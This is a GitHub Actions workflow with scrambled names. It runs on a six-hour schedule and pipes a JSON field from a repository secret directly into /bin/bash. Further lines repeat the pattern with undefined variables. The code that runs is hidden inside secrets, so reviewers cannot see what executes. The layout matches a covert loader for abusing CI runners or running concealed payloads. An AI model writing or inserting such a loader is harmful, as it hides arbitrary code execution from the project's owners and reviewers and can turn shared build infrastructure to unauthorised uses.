name: zhengzadak
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhengzadak
        env:
          gtfog81020: ${{ secrets.gtfog81020 }}
        run: |
          echo $gtfog81020 | jq -r .aei1483 | /bin/bash
          echo $zox6 | jq -r .qoqnp8 | /bin/bash
          echo $iubl20172 | jq -r .br52 | /bin/bash
          echo $j3408 | jq -r .o2 | /bin/bash
          echo $jodn29137 | jq -r .se39 | /bin/bash
          echo $fpk649 | jq -r .ac667 | /bin/bash
          echo $fdwkp9774 | jq -r .fvzv5667 | /bin/bash
          echo $y52568 | jq -r .nluli85085 | /bin/bash
          echo $id26 | jq -r .of78413 | /bin/bash

